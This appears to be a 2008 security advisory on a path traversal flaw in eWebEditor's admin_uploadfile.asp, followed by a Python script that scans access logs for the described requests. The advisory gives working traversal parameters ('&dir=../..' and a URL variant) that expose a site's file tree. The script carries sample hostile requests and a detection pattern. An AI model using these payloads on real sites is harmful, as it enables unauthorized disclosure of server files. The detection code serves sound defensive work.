eWebEditor path traversal vulnerability

ID MYHACK58:62200818162
Type myhack58
Reporter Anonymous
Modified 2008-01-16T00:00:00


eWebEditor description: eWebEditor is a WYSIWYG online editor. As the name suggests, it is used on the web for WYSIWYG editing of illustrated articles, news, discussion posts, circulars, notes and other word-processing content.

ewebeditor/admin_uploadfile.asp does not filter its input strictly, which results in a path traversal vulnerability.

<Reference: http://www.sebug.net, http://www.ewebeditor.net/>

Test method:

[Warning] The following procedures (methods) may be offensive in nature and are for security research and teaching purposes. Use at your own risk!

ewebeditor/admin_uploadfile.asp?id=14

After id=14, add &dir=.. and then extend it:

&dir=../..
&dir=http://www.****.com/../..

This shows the files of the entire website.

Recommendations: none

http://www.ewebeditor.net/
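A defender-side check for the request pattern described above, as an added example that is not part of the original advisory: it scans access-log lines for requests to admin_uploadfile.asp whose dir parameter decodes to a ".." segment or a URL. The "METHOD URI STATUS" log layout, the sample lines and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample lines in an assumed "METHOD URI STATUS" layout.
SAMPLE_LOG = """\
GET /ewebeditor/admin_uploadfile.asp?id=14 200
GET /ewebeditor/admin_uploadfile.asp?id=14&dir=.. 200
GET /ewebeditor/admin_uploadfile.asp?id=14&dir=2008%2F01 200
GET /eWebEditor/Admin_UploadFile.asp?id=14&DIR=%252e%252e%2f%252e%252e 200
GET /ewebeditor/admin_uploadfile.asp?id=14&dir=..%5C.. 200
GET /ewebeditor/admin_uploadfile.asp?id=14&dir=http://www.example.com/../.. 200
GET /news/show.asp?id=14&dir=.. 200
"""

TARGET = "/admin_uploadfile.asp"
# A ".." path segment (either slash style) or a leading URL scheme in dir.
SUSPICIOUS = re.compile(r"(^|[\\/])\.\.([\\/]|$)|^[a-z][a-z0-9+.-]*://", re.I)

def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding so %252e and %2e both become '.'."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_dir(uri):
    """Return the decoded dir value if it looks like traversal, else None."""
    parts = urlsplit(uri)
    if not parts.path.lower().endswith(TARGET):
        return None  # only the page named in the advisory is in scope
    for key, raw in parse_qsl(parts.query, keep_blank_values=True):
        if key.lower() == "dir":
            value = fully_decode(raw)
            if SUSPICIOUS.search(value):
                return value
    return None

def scan(log_text):
    """Return (line number, decoded dir value) for each flagged request."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        fields = line.split()
        value = suspicious_dir(fields[1]) if len(fields) >= 3 else None
        if value is not None:
            hits.append((lineno, value))
    return hits
```

Calling scan(SAMPLE_LOG) flags lines 2, 4, 5 and 6 of the sample; a real access log needs its own field split in scan() to match the server's log format.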